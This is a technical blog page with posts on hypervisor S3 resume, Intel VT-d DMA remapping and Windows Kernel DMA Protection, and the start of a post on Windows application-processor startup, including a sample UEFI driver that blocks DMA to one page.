href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDrIZcOEHhkrAIFelVbnTHPluhDHN5J8cGhbt_ICwp_vesOujaTTxmIiZEybbn26yyxioogGlLpmdAsAklkW1GirN0li5korZ-4zQJYz47ObkjuOHMkXwccS3nI4NGAamK1yj_oqLzUMQ/s2459/Untitled.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1014" data-original-width="2459" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDrIZcOEHhkrAIFelVbnTHPluhDHN5J8cGhbt_ICwp_vesOujaTTxmIiZEybbn26yyxioogGlLpmdAsAklkW1GirN0li5korZ-4zQJYz47ObkjuOHMkXwccS3nI4NGAamK1yj_oqLzUMQ/w521-h215/Untitled.png" width="521" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Hypervisor resuming from S3</td></tr></tbody></table><br /></div><div>This way, the hypervisor can take control over the system before running any OS (guest) specific code. Implementation of this can be found in multiple hypervisors such as ACRN Embedded Hypervisor and Bitvisor. </div></div><div><br /></div><div>For completeness, noting that the type1 hypervisor that is part of an OEM firmware image or PEI modules does not have to do any of those. If the module were part of the OEM image, it would be able to add a boot script to register reinitialization, and if the module were a PEI module, it would be executed even in the S3 resume boot path. </div><div><br /></div><h2 style="text-align: left;">Conclusion</h2><div>Entering and resuming from S3 is complex work that involves all OS, system firmware, and hardware implementation, as well as multiple specifications such as PI and ACPI. However, studying it allows us to familiarize ourselves with the industry standards and intriguing low-level implementation details. </div><div><br /></div><div>As a side note, I recommend learning type-1 hypervisors over OS kernel-based ones. Type-1 hypervisor is not just more flexible, it lets you understand greater details of how the system works (and arguably is a more common design across production-level hypervisors). I am still suspending the registration of the public hypervisor development class, but looking into reopening it sometime in the next year as a remote class. If you are interested, please reach out to tanda.sat@gmail.com for details. </div><div><br /></div><h2 style="text-align: left;">References</h2><div><ul style="text-align: left;"><li>ACPI Specification Version 6.3 Errata A (October 2020)</li><li>UEFI Platform Initialization Specification Version 1.7 (Errata A)</li><ul><li><a href="https://www.uefi.org/specifications">https://www.uefi.org/specifications</a></li></ul><li>Intel® 495 Series Chipset Family On-Package PCH Datasheet Vol. 2</li><ul><li><a href="https://www.intel.ca/content/www/ca/en/products/docs/chipsets/495-series-chipset-on-package-pch-datasheet-vol-2.html">https://www.intel.ca/content/www/ca/en/products/docs/chipsets/495-series-chipset-on-package-pch-datasheet-vol-2.html</a></li></ul><li>RWEverything</li><ul><li><a href="http://rweverything.com/">http://rweverything.com/</a></li></ul><li>Project ACRN Embedded Hypervisor</li><ul><li><a href="https://github.com/projectacrn/acrn-hypervisor">https://github.com/projectacrn/acrn-hypervisor</a></li><li>Search "host_enter_s3" function</li></ul><li>Bitvisor</li><ul><li><a href="https://github.com/matsu/bitvisor">https://github.com/matsu/bitvisor</a></li><li>Search "acpi_pm1_sleep" function</li></ul><li>EDK2</li><ul><li><a href="https://github.com/tianocore/edk2">https://github.com/tianocore/edk2</a></li></ul><li>A Tour Beyond BIOS Implementing S3 Resume with EDKII</li><ul><li><a href="https://github.com/tianocore-docs/Docs/raw/master/White_Papers/A_Tour_Beyond_BIOS_Implementing_S3_resume_with_EDKII_V2.pdf">https://github.com/tianocore-docs/Docs/raw/master/White_Papers/A_Tour_Beyond_BIOS_Implementing_S3_resume_with_EDKII_V2.pdf</a></li></ul></ul><h4 style="text-align: left;">EDIT</h4></div></div><div><ul style="text-align: left;"><li>Nov 25 - Correct that the boot phase relevant to 3rd party type 1 hypervisor is TSL and not BDS.</li></ul></div>Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-21640637651799405832020-05-18T06:10:00.001-07:002021-02-03T21:18:27.574-08:00Introductory Study of IOMMU (VT-d) and Kernel DMA Protection on Intel Processors This post is a write up of the introductory study of Intel VT-d, especially about how DMA remapping may be programmed and how Windows uses it. The hope is that this article helps you gain a basic understanding of it and start looking into more details as you are interested.<br />
<br />
<h2>
Intel VT-d</h2>
Intel VT-d, formally called as Intel VT for Directed I/O, consists of the following three features:<br />
<ul>
<li>DMA Remapping</li>
<li>Interrupt Remapping</li>
<li>Interrupt Posting</li>
</ul>
<div>
DMA remapping is the most commonly discussed feature out of those and is the focus of this article.<br />
<br /></div>
<div>
<h2>
DMA Remapping</h2>
</div>
<div>
DMA Remapping is an important feature because it allows software to implement security against Direct Memory Access (DMA) from malicious devices by configuring access permissions for each physical memory page. While ordinary memory page protections can be configured through the paging structures, and when Intel VT-x is used, through the Extended Page Tables (EPT), those configurations are completely ignored in case of DMA access. Therefore, the other protection mechanism is required to complete the protection of memory. DMA remapping achieves this.<br />
<br />
The following illustration from the specification highlights that DMA goes through DMA remapping instead of CPU memory virtualization (ie, EPT). </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK4kNxLhz7M728zgsvOSgSxmDZX35-98WheAq6kbkNzrnciwiFpk9wKB6gqaKW8MD-pMgeKYm5YR8yRMF4VZfQbQwkyFU5Il5pOMHs31je9CZkK5VqTajdKFoNnZvSvacjWrlCBfSbsf8/s1600/Untitled.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1008" data-original-width="1600" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK4kNxLhz7M728zgsvOSgSxmDZX35-98WheAq6kbkNzrnciwiFpk9wKB6gqaKW8MD-pMgeKYm5YR8yRMF4VZfQbQwkyFU5Il5pOMHs31je9CZkK5VqTajdKFoNnZvSvacjWrlCBfSbsf8/s640/Untitled.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<h2>
VT-x Not Required</h2>
</div>
<div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">Ignore the upper half of the illustration above. It is a typical misconception that VT-d (DMA remapping) is tied with VT-x, virtual machines, and such. DMA remapping is usable and useful without VT-x; Windows, for example, can enable a DMA remapping based security feature (called </span><a class="_e75a791d-denali-editor-page-rtfLink" href="https://docs.microsoft.com/en-us/windows/security/information-protection/kernel-dma-protection-for-thunderbolt" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #4a6ee0; margin-bottom: 0pt; margin-top: 0pt;" target="_blank"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">Kernel DMA Protection</span></a><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">) without requiring VT-x based security (VBS: Virtualization Based Security) enabled.</span></div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">The sample project shown in this post below enables DMA remapping independently as well.</span></div>
</div>
<div>
<br /></div>
<div>
<h2>
IOMMU</h2>
</div>
<div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">DMA remapping is also referred to as IOMMU, as it functions like Memory Management Unit (MMU) for IO memory access. Not only the concept is similar, but it also has a very similar programming interface as that of MMU, that is, the paging structures and EPT. </span></div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">At high-level, the major difference is that DMA remapping uses two more tables for translation, on the top of the familiar PML5, 4, PDPT, PD, and PT. Simply put, translation with MMU is</span></div>
<ul>
<li><span style="color: #0e101a;">Hardware register => PML4 => PDPT => ...</span></li>
</ul>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">while that of IOMMU is</span></div>
<ul>
<li><span style="color: #0e101a;">Hardware register => Root table => Context table => PML4 => PDPT => ...</span></li>
</ul>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">The specification refers to the tables referenced from the context table as the second-level page tables. The below diagram illustrates the translation flow.</span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGKRKe5F_xBt2Ztr87Bo2ahYqBD0ZDDOrHlN3cSPk49NWA7NU_sWisijXciYaskHPytG0EaqILIKWrlUKEBs0NtkZjPycc_HmICMrbS2QuCBpdlhUJiAIBmOOvVB6HzNRusV447xkSQQc/s1600/Annotation+2020-05-17+084714.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1102" data-original-width="1600" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGKRKe5F_xBt2Ztr87Bo2ahYqBD0ZDDOrHlN3cSPk49NWA7NU_sWisijXciYaskHPytG0EaqILIKWrlUKEBs0NtkZjPycc_HmICMrbS2QuCBpdlhUJiAIBmOOvVB6HzNRusV447xkSQQc/s640/Annotation+2020-05-17+084714.png" width="640" /></a></div>
<div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">Notice that,</span></div>
<ul>
<li><span style="color: #0e101a;">The entry of the root table is selected based on the bus number of the device requesting DMA.</span></li>
<li><span style="color: #0e101a;">The entry of the context table is selected based on a combination of device and function numbers of the device.</span></li>
</ul>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">
<span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">As an example of bus:device:function (referred to as source-id) assignment, my test DMA-capable device is listed as Bus 6 : Device 0 : Function 0 on one system as shown below.</span></div>
</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji7QSIongv35L1NhWZQY4fR41wlb1nhuhyphenhyphenY1MNggGPD5N4zzZzpilZ5h5z6khtlUJnZTxI3wP3whRv9SvEKkvM0EPSnyyILkzddoTfmxx6pdcBX6xKQ1h1cl140kB1MsKSSwejdlIMWu4/s1600/Annotation+2020-05-17+162803.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="1270" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji7QSIongv35L1NhWZQY4fR41wlb1nhuhyphenhyphenY1MNggGPD5N4zzZzpilZ5h5z6khtlUJnZTxI3wP3whRv9SvEKkvM0EPSnyyILkzddoTfmxx6pdcBX6xKQ1h1cl140kB1MsKSSwejdlIMWu4/s640/Annotation+2020-05-17+162803.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
<div>
<h2>
Sample Code and Demo</h2>
</div>
<div>
Let us jump into some code. The <a href="https://github.com/tandasat/HelloIommuPkg">HelloIommuPkg</a> is a runtime DXE driver that enables DMA remapping and protects its first page (PE header) from DMA read and write by any devices. </div>
<div>
<br /></div>
<div>
Loading this will yield the following output and protect the page if successful.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd9pJbhqX69RwA0c4jxT6U4Ha4espgujN5pqiUY7E0_aFtn3ceQuPRz2gZQA-qlGvEVvnVDPF20V7aZKH_2G6Dy9pjJyn43TIhJw3KzdBDeeFKCkqVPu2rrqThvIkQ2rfvpUtJskz8o8A/s1600/IMG_6433.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="459" data-original-width="1600" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd9pJbhqX69RwA0c4jxT6U4Ha4espgujN5pqiUY7E0_aFtn3ceQuPRz2gZQA-qlGvEVvnVDPF20V7aZKH_2G6Dy9pjJyn43TIhJw3KzdBDeeFKCkqVPu2rrqThvIkQ2rfvpUtJskz8o8A/s640/IMG_6433.jpg" width="640" /></a></div>
<div>
</div>
<div>
Then, performing DMA read with the test PCI device using <a href="https://github.com/ufrisk/pcileech" target="_blank">PCILeech</a> demonstrates that the other page is readable,</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHXq419hv-C2df9VLNXSXQbOdvoBm8svnf0kZNVPLDh85xu4UgRMFx59sgsrayKiaAodnrShUNOh_mTbxh0di-mMrLdtCnauUEp0LHjPHeXeNvfCZaD85XO94EOpb8z6kahXYUkbGi6sQ/s1600/Annotation+2020-05-17+101113.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="387" data-original-width="1578" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHXq419hv-C2df9VLNXSXQbOdvoBm8svnf0kZNVPLDh85xu4UgRMFx59sgsrayKiaAodnrShUNOh_mTbxh0di-mMrLdtCnauUEp0LHjPHeXeNvfCZaD85XO94EOpb8z6kahXYUkbGi6sQ/s640/Annotation+2020-05-17+101113.png" width="640" /></a></div>
<br /></div>
<div>
but the protected page is not.</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgccge18d1G6e6rvk2IPWjkjpO93dMM8klnbhH5w-5qm4eDBzCxsppWgT3kFkh8WdXN1pDPQQ1Q17Lv6gagsyAwJIvOp9jLZ3UeS5TtqjeKLm7wAAgRxTMzJ-548K2hNvl3dr1r40Kvu9Q/s1600/2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="233" data-original-width="1455" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgccge18d1G6e6rvk2IPWjkjpO93dMM8klnbhH5w-5qm4eDBzCxsppWgT3kFkh8WdXN1pDPQQ1Q17Lv6gagsyAwJIvOp9jLZ3UeS5TtqjeKLm7wAAgRxTMzJ-548K2hNvl3dr1r40Kvu9Q/s640/2.png" width="640" /></a></div>
<br />
<span data-preserver-spaces="true" style="color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">By inspecting one of the reported fault-recording registers using </span><a class="_e75a791d-denali-editor-page-rtfLink" href="http://rweverything.com/" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #4a6ee0; margin-bottom: 0pt; margin-top: 0pt;" target="_blank"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">RWEverything</span></a><span data-preserver-spaces="true" style="color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;">, it can be confirmed that DMA was indeed blocked by a lack of read-permission.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGv7uod6jrD8tKzOktFrgrdSST2ZR5meC34DG8dHGV-TQG-LrpDwMLgbftVS0Z8NusENnFUGdMXw-2_2BUJ9tnbKk-eJL6ke5KaFpBolGIn6qyoLHJMNu-zSjNegIwkIBov6m-ML3yQbU/s1600/Annotation+2020-05-17+163029.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="370" data-original-width="1267" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGv7uod6jrD8tKzOktFrgrdSST2ZR5meC34DG8dHGV-TQG-LrpDwMLgbftVS0Z8NusENnFUGdMXw-2_2BUJ9tnbKk-eJL6ke5KaFpBolGIn6qyoLHJMNu-zSjNegIwkIBov6m-ML3yQbU/s640/Annotation+2020-05-17+163029.png" width="640" /></a></div>
<ul>
<li>The first column indicates the faulting address (0x6ff48000)</li>
<li>The third column indicates the source-id of the requesting device (Bus 6 : Device 0 : Function 0)</li>
<li>6 in the fourth column indicates the lack of read-permission.<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLarjhyphenhyphenf7zNn1SmfAvtahO9tYxPkUNm7LbzYcKfIW0EI-yTrl5Su52o3m7jXUk_u70sEbg-SjCDHhU7nBUlOCpGyBxm5R3M_QqhgAbH8d20AxuIMExzgBA_c4zafEu0mwvZ-gGFyxkpHU/s1600/Picture1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="417" data-original-width="961" height="273" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLarjhyphenhyphenf7zNn1SmfAvtahO9tYxPkUNm7LbzYcKfIW0EI-yTrl5Su52o3m7jXUk_u70sEbg-SjCDHhU7nBUlOCpGyBxm5R3M_QqhgAbH8d20AxuIMExzgBA_c4zafEu0mwvZ-gGFyxkpHU/s640/Picture1.png" width="640" /></a></div>
</li>
</ul>
<br /></div>
<div>
<h2>
Programming IOMMU </h2>
Enabling DMA remapping at a minimum can be divided into the following steps:<br />
<ol>
<li>Locating the DMA Remapping Reporting (DMAR) ACPI table.</li>
<li>Gathering information about the available DMA remapping hardware units from DMA-remapping hardware unit definition (DRHD) structures in (1).</li>
<li>Configuring translation by initializing the tables mentioned above. </li>
<li>Writing hardware registers to use (3) and activating DMA remapping.</li>
</ol>
</div>
<div>
HelloIummuDxe.c roughly follows this sequence with some demonstration and error checking code. (1) and (2) are straightforward and can be validated tools like RWEverything.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQoL1NCHZtbM-MQm6GMB3L0STuyM6iVaE4h6zr1rN-pqfCPWTXQu-5J36UFcWehPRhtgKjWDRJ4fsSiH3eBDupxbcg4mPnV2Ubl8G-1_-W6VOUGscmcTEH1XQCo6wvFKHsFzaoZPigJL0/s1600/dmar.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="896" data-original-width="1600" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQoL1NCHZtbM-MQm6GMB3L0STuyM6iVaE4h6zr1rN-pqfCPWTXQu-5J36UFcWehPRhtgKjWDRJ4fsSiH3eBDupxbcg4mPnV2Ubl8G-1_-W6VOUGscmcTEH1XQCo6wvFKHsFzaoZPigJL0/s640/dmar.jpg" width="640" /></a></div>
<br />
The complexity of (3) varies largely depending on how granular and selective translations and memory protections are required. HelloIummuPkg allows any access from any device to anywhere, except against the single page, which simplifies this step. (4) is mostly just following the specification.<br />
<br />
Overall, the minimum steps are simple and HelloIummuPkg's line count without comments is less than 700 lines.<br />
<br /></div>
<div>
<h2>
Use of DMA Remapping on Windows </h2>
Windows uses DMA remapping when available. If the system does not enable Kernel DMA Protection, it configures translations mostly to pass-through all requests from all devices with few exceptions.<br />
<br />
The following screenshot taken from the system without Kernel DMA Protection shows translation for the DMA-capable device at Bus 7 : Device 0 : Function 0. The value 9 at the right bottom indicates DMA requests are passed thought (See "TT: Translation Type" in the specification). <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQqcvUD1obJU-gahuQJCH0Lmveqg1wBSeEjzbafdexcKLd6s1FOvFD1eNOPC7oHAXFrwX7mO1l0n72mFBoCvBVS9q-osUBouJWa-4QuXwT6fz664fhlze3Es1YxqVwBc9E17-GHclk7gw/s1600/Inkedno_kdma_LI.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="753" data-original-width="1600" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQqcvUD1obJU-gahuQJCH0Lmveqg1wBSeEjzbafdexcKLd6s1FOvFD1eNOPC7oHAXFrwX7mO1l0n72mFBoCvBVS9q-osUBouJWa-4QuXwT6fz664fhlze3Es1YxqVwBc9E17-GHclk7gw/s640/Inkedno_kdma_LI.jpg" width="640" /></a></div>
<br />
Notice the most of the entries points to the same context table at 0x1ac000 which is configured for pass-through, providing no protection.<br />
<br />
As a side note, it would be technically possible for third-party Windows drivers to modify those translations and attempt to provide additional security against DMA unless VBS is enabled.<br />
<br />
<h2>
Use of DMA Remapping with Kernel DMA Protection</h2>
If Kernel DMA Protection is enabled, most of the translations are configured to fail. This is achieved by pointing to the second-level PML4 that is filled with zero, meaning translations are not present.<br />
<br />
The below screenshot shows an example configuration with Kernel DMA Protection. Notice the context table at 0x1ac000 points to the second level PML4 at 0x251000, which is all zero.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5V2fLeiKbNBK_Tk9KV3hfW23-gzzz17V26laOyWxWOKVhdXmZ3NUcuebD3JCQbqZurDJhwZW4_01U8xMuUtI1SBdv4JSRdy_ZYKF8yCjwbwkElzFEEHlcuxSRolnoUv3KI1nJbhfkg_8/s1600/Inkedkdma2_LI.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="676" data-original-width="1600" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5V2fLeiKbNBK_Tk9KV3hfW23-gzzz17V26laOyWxWOKVhdXmZ3NUcuebD3JCQbqZurDJhwZW4_01U8xMuUtI1SBdv4JSRdy_ZYKF8yCjwbwkElzFEEHlcuxSRolnoUv3KI1nJbhfkg_8/s640/Inkedkdma2_LI.jpg" width="640" /></a></div>
<br />
Note that those memory locations are not visible if VBS is enabled. Disable it to inspect them.<br />
<br />
Interestingly, I was not able to observe the described behavior of Kernel DMA Protection, in that, regardless of whether the screen is locked, performing DMA against the device resulted in bug check 0xE6: DRIVER_VERIFIER_DMA_VIOLATION (type 0x26). From what I read from Hal.dll, it made sense to bug check, but I doubt this is how Kernel DMA Protection is supposed to protect the system.<br />
<br />
<h2>
Conclusion</h2>
DMA remapping is part of the Intel VT-d architecture providing security against DMA from malicious devices and can be enabled without Intel VT-x to be used together. The sample project HelloIommuPkg demonstrates the simple setup of DMA remapping from UEFI with less than 700 lines of code.<br />
<br />
It is shown that Windows enables DMA remapping if available, and when the Kernel DMA Protection feature is enabled, DMA access is mostly blocked though the second-level PML4.<br />
<br /></div>
<div>
<h2>
Further Learning Resources</h2>
<ul>
<li><a href="https://software.intel.com/content/www/us/en/develop/download/intel-virtualization-technology-for-directed-io-architecture-specification.html">Intel® Virtualization Technology for Directed I/O Architecture Specification</a></li>
<li><a href="https://software.intel.com/sites/default/files/managed/8d/88/intel-whitepaper-using-iommu-for-dma-protection-in-uefi.pdf">A Tour Beyond BIOS: Using IOMMU for DMA Protection in UEFI Firmware</a></li>
<li><a href="https://github.com/tianocore/edk2-platforms/tree/master/Silicon/Intel/IntelSiliconPkg/Feature/VTd">VTd module in IntelSiliconPkg</a></li>
<li>Hal.dll, especially</li>
<ul>
<li>HalpIvtProcessDrhdEntry and ExtEnvRegisterIommu, which are responsible for the programming step (2). Those highlight the layout of the structure passed across many of IOMMU related functions. </li>
<li>IvtInitializeIommu (and HalpIommuInitializeAll), which is responsible for part of the step (3) and (4).</li>
<li>HalpIommuConfigureInterrupt, IvtSetMessageInterruptRouting and IvtHandleInterrupt for the implementation of translation fault reporting (ie, how bug check is initiated).</li>
<li>Highly recommended to study the specification before reading Hal.</li>
</ul>
</ul>
</div>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBifGu8AOTqqJgp0wG5l7IidwF_VlzqWcW0BN9rT2yu_HcEt4OVO3PQ47k5Yc2oofUEVfGCK3LvMfRGQk83GUQWK6JH8OIQFrn7GfGl8ncBKhz6i2-Fg9nRHHSXYuydcmBnUxJwJgirj4/s1600/IMG_5580.JPG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1200" data-original-width="1600" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBifGu8AOTqqJgp0wG5l7IidwF_VlzqWcW0BN9rT2yu_HcEt4OVO3PQ47k5Yc2oofUEVfGCK3LvMfRGQk83GUQWK6JH8OIQFrn7GfGl8ncBKhz6i2-Fg9nRHHSXYuydcmBnUxJwJgirj4/s320/IMG_5580.JPG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px;">A cat protected from direct access.</td></tr>
</tbody></table>
</div>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com3tag:blogger.com,1999:blog-2937860723034111347.post-90270075213857343662020-03-20T06:17:00.000-07:002020-03-20T06:17:57.937-07:00Initializing Application Processors on WindowsThis post guides you to the journey of starting up application processors (APs) on Windows. This post can be read just for fun but can also help you make more sense of the INIT-SIPI-SIPI VM-exits sequence you have to handle when writing an UEFI hypervisor.<br />
<br />
<h2>
AP Initialization and Overview of Its Implementation</h2>
<div>
<br /></div>
<div>
Before running any software code, hardware selects the processor that gets initialized and starts executing firmware code. This processor is called a bootstrap processor (BSP) and is basically the sole active processor until an operating system starts up the rest of the processors. </div>
<div>
<br />
Those non-BSP are called APs and are initialized by the BSP sending a sequence of inter processor interrupts (IPIs): INIT, Startup IPI, and the 2nd Startup IPI. This sequence is also referred to as INIT-SIPI-SIPI.</div>
<div>
<br /></div>
<div>
As noted in the previous post, a hypervisor that starts earlier than the operating system needs to handle VM-exists caused by those IPIs. But when that happen exactly? </div>
<div>
<br /></div>
<div>
On Linux, this is relatively easy to find out. Searching "STARTUP IPI" in Linux source code or other developers' forums leads you to the implementation, <a href="https://elixir.bootlin.com/linux/latest/source/arch/x86/kernel/smpboot.c">smpboot.c</a>. On Windows 10, this is done in HalpApicStartProcessor, called from kernel's KeStartAllProcessors, in short. The stack trace is shown below: </div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">00 hal!HalpApicStartProcessor</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">01 hal!HalpInterruptStartProcessor</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">02 hal!HalStartNextProcessor</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">03 nt!KeStartAllProcessors</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">04 nt!Phase1InitializationDiscard</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">05 nt!Phase1Initialization</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">06 nt!PspSystemThreadStartup</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">07 nt!KiStartSystemThread</span>
</div>
<div>
<br /></div>
<div>
Let us look into little more details on Windows 19H1 (18362.1.amd64fre.19h1_release.190318-1202) without Hyper-V enabled. To be clear, the execution path varies drastically if Hyper-V is enabled.<br />
<br />
<h2>
High Level Flow</h2>
<br />
KeStartAllProcessors captures various system register values with KxInitializeProcessorState, updates per processor book keeping data structures and calls HalStartNextProcessors for each registered processor one by one to start all of them. </div>
<div>
<br /></div>
<div>
